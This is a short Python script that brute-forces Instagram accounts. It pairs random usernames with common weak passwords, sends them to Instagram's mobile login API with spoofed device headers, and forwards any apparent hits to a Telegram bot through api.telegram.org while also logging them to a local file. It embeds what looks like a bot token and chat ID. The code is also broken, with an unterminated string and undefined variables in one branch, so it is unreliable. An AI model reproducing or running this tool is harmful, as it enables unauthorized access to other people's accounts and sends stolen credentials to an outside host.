# Look at Roux accomplishments  { @C4CCQ }

import requests
import random
from uuid import uuid4
E = '\033[1;31m'
G = '\033[1;32m'
def HsEyUn():
	
	token = input(G+'5164265237:AAEXC7vZb1fZwa8gslGI9OJ4NSlIL5G_3BA :')
	id = input(G+'2053539816 ')
	while True:
		us3 = 'qwertyuiopasdf_ghjklzxcvbnm'
		us0 = '09876_54321'
		use1 = us0 + us3
		userx = ''.join((random.choice(use1) for x in range(8)))
		usr = userx
		HsEu = ('qaz12345', '121212', 'QQ1111', '123123123', '123456', 'MMMMMM', 'ZXCVBNM)
		t1 = random.choice(usr)
		t = random.choice(HsEu)
		url = 'https://i.instagram.com/api/v1/accounts/login/'
		headers = {'User-Agent':'Instagram 113.0.0.39.122 Android (24/5.0; 515dpi; 1440x2416; huawei/google; Nexus 6P; angler; angler; en_US)',  'Accept':'*/*', 
'Cookie':'missing', 
'Accept-Encoding':'gzip, deflate', 
'Accept-Language':'en-US', 
'X-IG-Capabilities':'3brTvw==', 
'X-IG-Connection-Type':'WIFI', 
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 
'Host':'i.instagram.com'}
		uid= str(uuid4())
		data = {'uuid':uid,
'password':t, 
'username':usr, 
'device_id':uid, 
'from_reg':'false', 
'_csrftoken':'missing', 
'login_attempt_countn':'0'}
		reqq= requests.post(url, headers=headers, data=data, allow_redirects=True)
		
		if "rate_limit_error" in reqq.text:
			print (G+f"Kid -13 Ban : {usr}:{t}")
			tlg = (f'https://api.telegram.org/bot{token}/sendMessage?chat_id={id}&text=YoU GeT InStA 4 BaN -13 🔥\n = = = = = = = = = = = =\n USER : {usr}\n PASS : {t}\n = = = = = = = = = = = =')
			a = requests.post(tlg)
			open("Acconat.txt","a").write(f"Band >> {usr}:{t}\n")
			
		elif 'bad_password' in reqq.text:
			print(E+f"Error Password : {usr}:{t}")
		elif 'checkpoint_challenge_required' in reqq.text:
			print (G+f"Checkpoint : {usr}:{t}")
			tlgg = (f'https://api.telegram.org/bot{token}/sendMessage?chat_id={id}&text=YoU GeT InStA 4 🔥\n = = = = = = = = = = = =\n USER : {username}\n PASS : {password}\n = = = = = = = = = = = =')
			a = requests.post(tlgg)
			open("Acconat.txt","a").write(f" Chckpoint >> {usr}:{t}\n")
		
		else:
			print(G+f"Fall Login ! : {usr}:{t}")
			tlggg = (f'https://api.telegram.org/bot{token}/sendMessage?chat_id={id}&text=YoU GeT InStA 4 🔥\n = = = = = = = = = = = =\n USER : {usr}\n PASS : {t}\n = = = = = = = = = = = =')
			a = requests.post(tlggg)
HsEyUn()
